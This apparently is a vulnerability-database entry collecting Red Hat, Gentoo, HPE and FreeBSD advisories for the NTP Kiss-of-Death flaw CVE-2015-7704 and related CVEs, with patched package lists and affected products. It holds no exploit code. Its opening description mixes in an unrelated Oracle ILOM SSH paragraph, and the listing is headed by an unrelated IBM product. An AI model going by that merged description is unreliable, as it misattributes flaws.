Search criteria

Vendor

Product

Assigner

Sources

Sort by

Order

50 vulnerabilities found for Power HMC by IBM

VAR-201708-1547

Vulnerability from variot - Updated: 2024-07-23 21:56

The ntpd client in NTP 4.x before 4.2.8p4 and 4.3.x before 4.3.77 allows remote attackers to cause a denial of service via a number of crafted "KOD" messages. The NTP.org reference implementation of ntpd contains multiple vulnerabilities. NTP Contains an input validation vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. Network Time Protocol is prone to a denial-of-service vulnerability. An attacker can leverage this issue to cause a denial-of-service condition. Oracle Integrated Lights Out Manager is prone to a remote security vulnerability in ILOM. The vulnerability can be exploited over the 'SSH' protocol. The 'SSH' sub component is affected. This vulnerability affects the following supported versions: 3.0, 3.1, 3.2 NOTE: This BID is being retired as it is a duplicate of BID 75990 (OpenSSH Login Handling Security Bypass Weakness). Summary:

Updated ntp packages that fix two security issues are now available for Red Hat Enterprise Linux 6 and 7.

Red Hat Product Security has rated this update as having Important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. Relevant releases/architectures:

Red Hat Enterprise Linux Client (v. 7) - x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - noarch, x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - noarch, x86_64 Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64 Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, noarch, x86_64 Red Hat Enterprise Linux HPC Node (v. 6) - x86_64 Red Hat Enterprise Linux HPC Node Optional (v. 6) - noarch, x86_64 Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 6) - i386, noarch, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - x86_64 Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, noarch, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - noarch, x86_64

It was discovered that ntpd as a client did not correctly check timestamps in Kiss-of-Death packets. (CVE-2015-7704)

It was found that ntpd did not correctly implement the threshold limitation for the '-g' option, which is used to set the time without any restrictions. A man-in-the-middle attacker able to intercept NTP traffic between a connecting client and an NTP server could use this flaw to force that client to make multiple steps larger than the panic threshold, effectively changing the time to an arbitrary value. (CVE-2015-5300)

Red Hat would like to thank Aanchal Malhotra, Isaac E. Cohen, and Sharon Goldberg of Boston University for reporting these issues.

All ntp users are advised to upgrade to these updated packages, which contain backported patches to resolve these issues. Solution:

Before applying this update, make sure all previously released errata relevant to your system have been applied.

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

Bugs fixed (https://bugzilla.redhat.com/):

1271070 - CVE-2015-7704 ntp: disabling synchronization via crafted KoD packet 1271076 - CVE-2015-5300 ntp: MITM attacker can force ntpd to make a step larger than the panic threshold

Package List:

Red Hat Enterprise Linux Desktop (v. 6):

Source: ntp-4.2.6p5-5.el6_7.2.src.rpm

i386: ntp-4.2.6p5-5.el6_7.2.i686.rpm ntp-debuginfo-4.2.6p5-5.el6_7.2.i686.rpm ntpdate-4.2.6p5-5.el6_7.2.i686.rpm

x86_64: ntp-4.2.6p5-5.el6_7.2.x86_64.rpm ntp-debuginfo-4.2.6p5-5.el6_7.2.x86_64.rpm ntpdate-4.2.6p5-5.el6_7.2.x86_64.rpm

Red Hat Enterprise Linux Desktop Optional (v. 6):

i386: ntp-debuginfo-4.2.6p5-5.el6_7.2.i686.rpm ntp-perl-4.2.6p5-5.el6_7.2.i686.rpm

noarch: ntp-doc-4.2.6p5-5.el6_7.2.noarch.rpm

x86_64: ntp-debuginfo-4.2.6p5-5.el6_7.2.x86_64.rpm ntp-perl-4.2.6p5-5.el6_7.2.x86_64.rpm

Red Hat Enterprise Linux HPC Node (v. 6):

Source: ntp-4.2.6p5-5.el6_7.2.src.rpm

x86_64: ntp-4.2.6p5-5.el6_7.2.x86_64.rpm ntp-debuginfo-4.2.6p5-5.el6_7.2.x86_64.rpm ntpdate-4.2.6p5-5.el6_7.2.x86_64.rpm

Red Hat Enterprise Linux HPC Node Optional (v. 6):

noarch: ntp-doc-4.2.6p5-5.el6_7.2.noarch.rpm

x86_64: ntp-debuginfo-4.2.6p5-5.el6_7.2.x86_64.rpm ntp-perl-4.2.6p5-5.el6_7.2.x86_64.rpm

Red Hat Enterprise Linux Server (v. 6):

Source: ntp-4.2.6p5-5.el6_7.2.src.rpm

i386: ntp-4.2.6p5-5.el6_7.2.i686.rpm ntp-debuginfo-4.2.6p5-5.el6_7.2.i686.rpm ntpdate-4.2.6p5-5.el6_7.2.i686.rpm

ppc64: ntp-4.2.6p5-5.el6_7.2.ppc64.rpm ntp-debuginfo-4.2.6p5-5.el6_7.2.ppc64.rpm ntpdate-4.2.6p5-5.el6_7.2.ppc64.rpm

s390x: ntp-4.2.6p5-5.el6_7.2.s390x.rpm ntp-debuginfo-4.2.6p5-5.el6_7.2.s390x.rpm ntpdate-4.2.6p5-5.el6_7.2.s390x.rpm

x86_64: ntp-4.2.6p5-5.el6_7.2.x86_64.rpm ntp-debuginfo-4.2.6p5-5.el6_7.2.x86_64.rpm ntpdate-4.2.6p5-5.el6_7.2.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 6):

i386: ntp-debuginfo-4.2.6p5-5.el6_7.2.i686.rpm ntp-perl-4.2.6p5-5.el6_7.2.i686.rpm

noarch: ntp-doc-4.2.6p5-5.el6_7.2.noarch.rpm

ppc64: ntp-debuginfo-4.2.6p5-5.el6_7.2.ppc64.rpm ntp-perl-4.2.6p5-5.el6_7.2.ppc64.rpm

s390x: ntp-debuginfo-4.2.6p5-5.el6_7.2.s390x.rpm ntp-perl-4.2.6p5-5.el6_7.2.s390x.rpm

x86_64: ntp-debuginfo-4.2.6p5-5.el6_7.2.x86_64.rpm ntp-perl-4.2.6p5-5.el6_7.2.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 6):

Source: ntp-4.2.6p5-5.el6_7.2.src.rpm

i386: ntp-4.2.6p5-5.el6_7.2.i686.rpm ntp-debuginfo-4.2.6p5-5.el6_7.2.i686.rpm ntpdate-4.2.6p5-5.el6_7.2.i686.rpm

x86_64: ntp-4.2.6p5-5.el6_7.2.x86_64.rpm ntp-debuginfo-4.2.6p5-5.el6_7.2.x86_64.rpm ntpdate-4.2.6p5-5.el6_7.2.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 6):

i386: ntp-debuginfo-4.2.6p5-5.el6_7.2.i686.rpm ntp-perl-4.2.6p5-5.el6_7.2.i686.rpm

noarch: ntp-doc-4.2.6p5-5.el6_7.2.noarch.rpm

x86_64: ntp-debuginfo-4.2.6p5-5.el6_7.2.x86_64.rpm ntp-perl-4.2.6p5-5.el6_7.2.x86_64.rpm

Red Hat Enterprise Linux Client (v. 7):

Source: ntp-4.2.6p5-19.el7_1.3.src.rpm

x86_64: ntp-4.2.6p5-19.el7_1.3.x86_64.rpm ntp-debuginfo-4.2.6p5-19.el7_1.3.x86_64.rpm ntpdate-4.2.6p5-19.el7_1.3.x86_64.rpm

Red Hat Enterprise Linux Client Optional (v. 7):

noarch: ntp-doc-4.2.6p5-19.el7_1.3.noarch.rpm ntp-perl-4.2.6p5-19.el7_1.3.noarch.rpm

x86_64: ntp-debuginfo-4.2.6p5-19.el7_1.3.x86_64.rpm sntp-4.2.6p5-19.el7_1.3.x86_64.rpm

Red Hat Enterprise Linux ComputeNode (v. 7):

Source: ntp-4.2.6p5-19.el7_1.3.src.rpm

x86_64: ntp-4.2.6p5-19.el7_1.3.x86_64.rpm ntp-debuginfo-4.2.6p5-19.el7_1.3.x86_64.rpm ntpdate-4.2.6p5-19.el7_1.3.x86_64.rpm

Red Hat Enterprise Linux ComputeNode Optional (v. 7):

noarch: ntp-doc-4.2.6p5-19.el7_1.3.noarch.rpm ntp-perl-4.2.6p5-19.el7_1.3.noarch.rpm

x86_64: ntp-debuginfo-4.2.6p5-19.el7_1.3.x86_64.rpm sntp-4.2.6p5-19.el7_1.3.x86_64.rpm

Red Hat Enterprise Linux Server (v. 7):

Source: ntp-4.2.6p5-19.el7_1.3.src.rpm

ppc64: ntp-4.2.6p5-19.el7_1.3.ppc64.rpm ntp-debuginfo-4.2.6p5-19.el7_1.3.ppc64.rpm ntpdate-4.2.6p5-19.el7_1.3.ppc64.rpm

s390x: ntp-4.2.6p5-19.el7_1.3.s390x.rpm ntp-debuginfo-4.2.6p5-19.el7_1.3.s390x.rpm ntpdate-4.2.6p5-19.el7_1.3.s390x.rpm

x86_64: ntp-4.2.6p5-19.el7_1.3.x86_64.rpm ntp-debuginfo-4.2.6p5-19.el7_1.3.x86_64.rpm ntpdate-4.2.6p5-19.el7_1.3.x86_64.rpm

Red Hat Enterprise Linux Server (v. 7):

Source: ntp-4.2.6p5-19.ael7b_1.3.src.rpm

ppc64le: ntp-4.2.6p5-19.ael7b_1.3.ppc64le.rpm ntp-debuginfo-4.2.6p5-19.ael7b_1.3.ppc64le.rpm ntpdate-4.2.6p5-19.ael7b_1.3.ppc64le.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

noarch: ntp-doc-4.2.6p5-19.el7_1.3.noarch.rpm ntp-perl-4.2.6p5-19.el7_1.3.noarch.rpm

ppc64: ntp-debuginfo-4.2.6p5-19.el7_1.3.ppc64.rpm sntp-4.2.6p5-19.el7_1.3.ppc64.rpm

s390x: ntp-debuginfo-4.2.6p5-19.el7_1.3.s390x.rpm sntp-4.2.6p5-19.el7_1.3.s390x.rpm

x86_64: ntp-debuginfo-4.2.6p5-19.el7_1.3.x86_64.rpm sntp-4.2.6p5-19.el7_1.3.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

noarch: ntp-doc-4.2.6p5-19.ael7b_1.3.noarch.rpm ntp-perl-4.2.6p5-19.ael7b_1.3.noarch.rpm

ppc64le: ntp-debuginfo-4.2.6p5-19.ael7b_1.3.ppc64le.rpm sntp-4.2.6p5-19.ael7b_1.3.ppc64le.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source: ntp-4.2.6p5-19.el7_1.3.src.rpm

x86_64: ntp-4.2.6p5-19.el7_1.3.x86_64.rpm ntp-debuginfo-4.2.6p5-19.el7_1.3.x86_64.rpm ntpdate-4.2.6p5-19.el7_1.3.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 7):

noarch: ntp-doc-4.2.6p5-19.el7_1.3.noarch.rpm ntp-perl-4.2.6p5-19.el7_1.3.noarch.rpm

x86_64: ntp-debuginfo-4.2.6p5-19.el7_1.3.x86_64.rpm sntp-4.2.6p5-19.el7_1.3.x86_64.rpm

These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/

References:

https://access.redhat.com/security/cve/CVE-2015-5300 https://access.redhat.com/security/cve/CVE-2015-7704 https://access.redhat.com/security/updates/classification/#important

Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

Gentoo Linux Security Advisory GLSA 201607-15

                                       https://security.gentoo.org/

Severity: Normal Title: NTP: Multiple vulnerabilities Date: July 20, 2016 Bugs: #563774, #572452, #581528, #584954 ID: 201607-15

Synopsis

Multiple vulnerabilities have been found in NTP, the worst of which could lead to Denial of Service.

Affected packages

-------------------------------------------------------------------
 Package              /     Vulnerable     /            Unaffected
-------------------------------------------------------------------

1 net-misc/ntp < 4.2.8_p8 >= 4.2.8_p8

Description

Multiple vulnerabilities have been discovered in NTP. Please review the CVE identifiers referenced below for details.

Resolution

All NTP users should upgrade to the latest version:

# emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/ntp-4.2.8_p8"

References

[ 1 ] CVE-2015-7691 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7691 [ 2 ] CVE-2015-7692 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7692 [ 3 ] CVE-2015-7701 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7701 [ 4 ] CVE-2015-7702 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7702 [ 5 ] CVE-2015-7703 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7703 [ 6 ] CVE-2015-7704 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7704 [ 7 ] CVE-2015-7705 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7705 [ 8 ] CVE-2015-7848 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7848 [ 9 ] CVE-2015-7849 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7849 [ 10 ] CVE-2015-7850 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7850 [ 11 ] CVE-2015-7851 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7851 [ 12 ] CVE-2015-7852 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7852 [ 13 ] CVE-2015-7853 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7853 [ 14 ] CVE-2015-7854 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7854 [ 15 ] CVE-2015-7855 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7855 [ 16 ] CVE-2015-7871 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7871 [ 17 ] CVE-2015-7973 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7973 [ 18 ] CVE-2015-7974 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7974 [ 19 ] CVE-2015-7975 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7975 [ 20 ] CVE-2015-7976 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7976 [ 21 ] CVE-2015-7977 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7977 [ 22 ] CVE-2015-7978 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7978 [ 23 ] CVE-2015-7979 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7979 [ 24 ] CVE-2015-8138 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8138 [ 25 ] CVE-2015-8139 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8139 [ 26 ] CVE-2015-8140 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8140 [ 27 ] CVE-2015-8158 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8158 [ 28 ] CVE-2016-1547 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1547 [ 29 ] CVE-2016-1548 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1548 [ 30 ] CVE-2016-1549 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1549 [ 31 ] CVE-2016-1550 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1550 [ 32 ] CVE-2016-1551 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1551 [ 33 ] CVE-2016-2516 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2516 [ 34 ] CVE-2016-2517 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2517 [ 35 ] CVE-2016-2518 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2518 [ 36 ] CVE-2016-2519 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2519 [ 37 ] CVE-2016-4953 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4953 [ 38 ] CVE-2016-4954 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4954 [ 39 ] CVE-2016-4955 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4955 [ 40 ] CVE-2016-4956 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4956 [ 41 ] CVE-2016-4957 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4957

Availability

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

https://security.gentoo.org/glsa/201607-15

Concerns?

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.

License

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5

Release Date: 2016-09-21 Last Updated: 2016-09-21

Potential Security Impact: Multiple Remote Vulnerabilities

Source: Hewlett Packard Enterprise, Product Security Response Team

VULNERABILITY SUMMARY Potential security vulnerabilities in NTP have been addressed with HPE Comware 7 (CW7) network products.

References:

CVE-2015-7704
CVE-2015-7705
CVE-2015-7855
CVE-2015-7871
PSRT110228
SSRT102943

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. - Comware 7 (CW7) Products - Please refer to the RESOLUTION below for a list of impacted products. All product versions are impacted prior to the fixed versions listed.

BACKGROUND

CVSS Base Metrics ================= Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector

CVE-2015-7704
  6.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L
  6.4 (AV:N/AC:L/Au:N/C:N/I:P/A:P)

CVE-2015-7705
  6.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L
  6.4 (AV:N/AC:L/Au:N/C:N/I:P/A:P)

CVE-2015-7855
  6.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L
  6.4 (AV:N/AC:L/Au:N/C:N/I:P/A:P)

CVE-2015-7871
  5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
  5.0 (AV:N/AC:L/Au:N/C:N/I:P/A:N)

Information on CVSS is documented in
HPE Customer Notice HPSN-2008-002 here:

https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499

RESOLUTION HPE has released the following software updates to resolve the vulnerabilities in HPE Comware 7 network products.

COMWARE 7 Products

12500 (Comware 7) - Version: R7377
- HP Network Products
- JC072B HP 12500 Main Processing Unit
- JC085A HP A12518 Switch Chassis
- JC086A HP A12508 Switch Chassis
- JC652A HP 12508 DC Switch Chassis
- JC653A HP 12518 DC Switch Chassis
- JC654A HP 12504 AC Switch Chassis
- JC655A HP 12504 DC Switch Chassis
- JF430A HP A12518 Switch Chassis
- JF430B HP 12518 Switch Chassis
- JF430C HP 12518 AC Switch Chassis
- JF431A HP A12508 Switch Chassis
- JF431B HP 12508 Switch Chassis
- JF431C HP 12508 AC Switch Chassis
- JG497A HP 12500 MPU w/Comware V7 OS
- JG782A HP FF 12508E AC Switch Chassis
- JG783A HP FF 12508E DC Switch Chassis
- JG784A HP FF 12518E AC Switch Chassis
- JG785A HP FF 12518E DC Switch Chassis
- JG802A HP FF 12500E MPU
10500 (Comware 7) - Version: R7178
- HP Network Products
- JC611A HP 10508-V Switch Chassis
- JC612A HP 10508 Switch Chassis
- JC613A HP 10504 Switch Chassis
- JC748A HP 10512 Switch Chassis
- JG608A HP FlexFabric 11908-V Switch Chassis
- JG609A HP FlexFabric 11900 Main Processing Unit
- JG820A HP 10504 TAA Switch Chassis
- JG821A HP 10508 TAA Switch Chassis
- JG822A HP 10508-V TAA Switch Chassis
- JG823A HP 10512 TAA Switch Chassis
- JG496A HP 10500 Type A MPU w/Comware v7 OS
- JH198A HP 10500 Type D Main Processing Unit with Comware v7 Operating System
- JH206A HP 10500 Type D TAA-compliant with Comware v7 Operating System Main Processing Unit
12900 (Comware 7) - Version: R1138P03
- HP Network Products
- JG619A HP FlexFabric 12910 Switch AC Chassis
- JG621A HP FlexFabric 12910 Main Processing Unit
- JG632A HP FlexFabric 12916 Switch AC Chassis
- JG634A HP FlexFabric 12916 Main Processing Unit
- JH104A HP FlexFabric 12900E Main Processing Unit
- JH114A HP FlexFabric 12910 TAA-compliant Main Processing Unit
- JH263A HP FlexFabric 12904E Main Processing Unit
- JH255A HP FlexFabric 12908E Switch Chassis
- JH262A HP FlexFabric 12904E Switch Chassis
- JH113A HP FlexFabric 12910 TAA-compliant Switch AC Chassis
- JH103A HP FlexFabric 12916E Switch Chassis
5900 (Comware 7) - Version: R2422P02
- HP Network Products
- JC772A HP 5900AF-48XG-4QSFP+ Switch
- JG296A HP 5920AF-24XG Switch
- JG336A HP 5900AF-48XGT-4QSFP+ Switch
- JG510A HP 5900AF-48G-4XG-2QSFP+ Switch
- JG554A HP 5900AF-48XG-4QSFP+ TAA Switch
- JG555A HP 5920AF-24XG TAA Switch
- JG838A HP FF 5900CP-48XG-4QSFP+ Switch
- JH036A HP FlexFabric 5900CP 48XG 4QSFP+ TAA-Compliant
- JH037A HP 5900AF 48XGT 4QSFP+ TAA-Compliant Switch
- JH038A HP 5900AF 48G 4XG 2QSFP+ TAA-Compliant
MSR1000 (Comware 7) - Version: R0305P08
- HP Network Products
- JG875A HP MSR1002-4 AC Router
- JH060A HP MSR1003-8S AC Router
MSR2000 (Comware 7) - Version: R0305P08
- HP Network Products
- JG411A HP MSR2003 AC Router
- JG734A HP MSR2004-24 AC Router
- JG735A HP MSR2004-48 Router
- JG866A HP MSR2003 TAA-compliant AC Router
MSR3000 (Comware 7) - Version: R0305P08
- HP Network Products
- JG404A HP MSR3064 Router
- JG405A HP MSR3044 Router
- JG406A HP MSR3024 AC Router
- JG407A HP MSR3024 DC Router
- JG408A HP MSR3024 PoE Router
- JG409A HP MSR3012 AC Router
- JG410A HP MSR3012 DC Router
- JG861A HP MSR3024 TAA-compliant AC Router
MSR4000 (Comware 7) - Version: R0305P08
- HP Network Products
- JG402A HP MSR4080 Router Chassis
- JG403A HP MSR4060 Router Chassis
- JG412A HP MSR4000 MPU-100 Main Processing Unit
- JG869A HP MSR4000 TAA-compliant MPU-100 Main Processing Unit
VSR (Comware 7) - Version: E0322
- HP Network Products
- JG810AAE HP VSR1001 Virtual Services Router 60 Day Evaluation Software
- JG811AAE HP VSR1001 Comware 7 Virtual Services Router
- JG812AAE HP VSR1004 Comware 7 Virtual Services Router
- JG813AAE HP VSR1008 Comware 7 Virtual Services Router
7900 (Comware 7) - Version: R2138P03
- HP Network Products
- JG682A HP FlexFabric 7904 Switch Chassis
- JG841A HP FlexFabric 7910 Switch Chassis
- JG842A HP FlexFabric 7910 7.2Tbps Fabric / Main Processing Unit
- JH001A HP FlexFabric 7910 2.4Tbps Fabric / Main Processing Unit
- JH122A HP FlexFabric 7904 TAA-compliant Switch Chassis
- JH123A HP FlexFabric 7910 TAA-compliant Switch Chassis
- JH124A HP FlexFabric 7910 7.2Tbps TAA-compliant Fabric/Main Processing Unit
- JH125A HP FlexFabric 7910 2.4Tbps TAA-compliant Fabric/Main Processing Unit
5130 (Comware 7) - Version: R3111P03
- HP Network Products
- JG932A HP 5130-24G-4SFP+ EI Switch
- JG933A HP 5130-24G-SFP-4SFP+ EI Switch
- JG934A HP 5130-48G-4SFP+ EI Switch
- JG936A HP 5130-24G-PoE+-4SFP+ (370W) EI Switch
- JG937A HP 5130-48G-PoE+-4SFP+ (370W) EI Switch
- JG938A HP 5130-24G-2SFP+-2XGT EI Switch
- JG939A HP 5130-48G-2SFP+-2XGT EI Switch
- JG940A HP 5130-24G-PoE+-2SFP+-2XGT (370W) EI Switch
- JG941A HP 5130-48G-PoE+-2SFP+-2XGT (370W) EI Switch
- JG975A HP 5130-24G-4SFP+ EI Brazil Switch
- JG976A HP 5130-48G-4SFP+ EI Brazil Switch
- JG977A HP 5130-24G-PoE+-4SFP+ (370W) EI Brazil Switch
- JG978A HP 5130-48G-PoE+-4SFP+ (370W) EI Brazil Switch
5700 (Comware 7) - Version: R2422P02
- HP Network Products
- JG894A HP FlexFabric 5700-48G-4XG-2QSFP+ Switch
- JG895A HP FlexFabric 5700-48G-4XG-2QSFP+ TAA-compliant Switch
- JG896A HP FlexFabric 5700-40XG-2QSFP+ Switch
- JG897A HP FlexFabric 5700-40XG-2QSFP+ TAA-compliant Switch
- JG898A HP FlexFabric 5700-32XGT-8XG-2QSFP+ Switch
- JG899A HP FlexFabric 5700-32XGT-8XG-2QSFP+ TAA-compliant Switch
5930 (Comware 7) - Version: R2422P02
- HP Network Products
- JG726A HP FlexFabric 5930 32QSFP+ Switch
- JG727A HP FlexFabric 5930 32QSFP+ TAA-compliant Switch
- JH178A HP FlexFabric 5930 2QSFP+ 2-slot Switch
- JH179A HP FlexFabric 5930 4-slot Switch
- JH187A HP FlexFabric 5930 2QSFP+ 2-slot TAA-compliant Switch
- JH188A HP FlexFabric 5930 4-slot TAA-compliant Switch
HSR6600 (Comware 7) - Version: R7103P07
- HP Network Products
- JG353A HP HSR6602-G Router
- JG354A HP HSR6602-XG Router
- JG776A HP HSR6602-G TAA-compliant Router
- JG777A HP HSR6602-XG TAA-compliant Router
HSR6800 (Comware 7) - Version: R7103P07
- HP Network Products
- JG361A HP HSR6802 Router Chassis
- JG361B HP HSR6802 Router Chassis
- JG362A HP HSR6804 Router Chassis
- JG362B HP HSR6804 Router Chassis
- JG363A HP HSR6808 Router Chassis
- JG363B HP HSR6808 Router Chassis
- JG364A HP HSR6800 RSE-X2 Router Main Processing Unit
- JG779A HP HSR6800 RSE-X2 Router TAA-compliant Main Processing
- JH075A HP HSR6800 RSE-X3 Router Main Processing Unit
1950 (Comware 7) - Version: R3111P03
- HP Network Products
- JG960A HP 1950-24G-4XG Switch
- JG961A HP 1950-48G-2SFP+-2XGT Switch
- JG962A HP 1950-24G-2SFP+-2XGT-PoE+(370W) Switch
- JG963A HP 1950-48G-2SFP+-2XGT-PoE+(370W) Switch
7500 (Comware 7) - Version: R7178
- HP Network Products
- JD238C HP 7510 Switch Chassis
- JD239C HP 7506 Switch Chassis
- JD240C HP 7503 Switch Chassis
- JD242C HP 7502 Switch Chassis
- JH207A HP 7500 1.2Tbps Fabric with 2-port 40GbE QSFP+ for IRF-Only Main Processing Unit
- JH208A HP 7502 Main Processing Unit
- JH209A HP 7500 2.4Tbps Fabric with 8-port 1/10GbE SFP+ and 2-port 40GbE QSFP+ Main Processing Unit
5130HI - Version: R1118P02
- HP Network Products
- JH323A HPE 5130 24G 4SFP+ 1-slot HI Switch
- JH324A HPE 5130 48G 4SFP+ 1-slot HI Switch
- JH325A HPE 5130 24G PoE+ 4SFP+ 1-slot HI Switch
- JH326A HPE 5130 48G PoE+ 4SFP+ 1-slot HI Switch
5510HI - Version: R1118P02
- HP Network Products
- JH145A HPE 5510 24G 4SFP+ HI 1-slot Switch
- JH146A HPE 5510 48G 4SFP+ HI 1-slot Switch
- JH147A HPE 5510 24G PoE+ 4SFP+ HI 1-slot Switch
- JH148A HPE 5510 48G PoE+ 4SFP+ HI 1-slot Switch
- JH149A HPE 5510 24G SFP 4SFP+ HI 1-slot Switch

Note: Please contact HPE Technical Support if any assistance is needed acquiring the software updates.

HISTORY Version:1 (rev.1) - 21 September 2016 Initial release

Third Party Security Patches: Third party security patches that are to be installed on systems running Hewlett Packard Enterprise (HPE) software products should be applied in accordance with the customer's patch management policy.

Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HPE Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hpe.com.

Report: To report a potential security vulnerability for any HPE supported product: Web form: https://www.hpe.com/info/report-security-vulnerability Email: security-alert@hpe.com

Subscribe: To initiate a subscription to receive future HPE Security Bulletin alerts via Email: http://www.hpe.com/support/Subscriber_Choice

Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://www.hpe.com/support/Security_Bulletin_Archive

Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.

3C = 3COM 3P = 3rd Party Software GN = HPE General Software HF = HPE Hardware and Firmware MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PV = ProCurve ST = Storage Software UX = HP-UX

Hewlett Packard Enterprise shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett Packard Enterprise and the names of Hewlett Packard Enterprise products referenced herein are trademarks of Hewlett Packard Enterprise in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1

============================================================================= FreeBSD-SA-15:25.ntp Security Advisory The FreeBSD Project

Topic: Multiple vulnerabilities of ntp

Category: contrib Module: ntp Announced: 2015-10-26 Credits: Network Time Foundation Affects: All supported versions of FreeBSD. Corrected: 2015-10-26 11:35:40 UTC (stable/10, 10.2-STABLE) 2015-10-26 11:36:55 UTC (releng/10.2, 10.2-RELEASE-p6) 2015-10-26 11:37:31 UTC (releng/10.1, 10.1-RELEASE-p23) 2015-10-26 11:36:40 UTC (stable/9, 9.3-STABLE) 2015-10-26 11:42:25 UTC (releng/9.3, 9.3-RELEASE-p29) CVE Name: CVE-2015-7701, CVE-2015-7702, CVE-2015-7703, CVE-2015-7704, CVE-2015-7848, CVE-2015-7849, CVE-2015-7850, CVE-2015-7851, CVE-2015-7852, CVE-2015-7853, CVE-2015-7854, CVE-2015-7855, CVE-2015-7871

For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/.

II. Problem Description

Crypto-NAK packets can be used to cause ntpd(8) to accept time from an unauthenticated ephemeral symmetric peer by bypassing the authentication required to mobilize peer associations. [CVE-2015-7871] FreeBSD 9.3 and 10.1 are not affected.

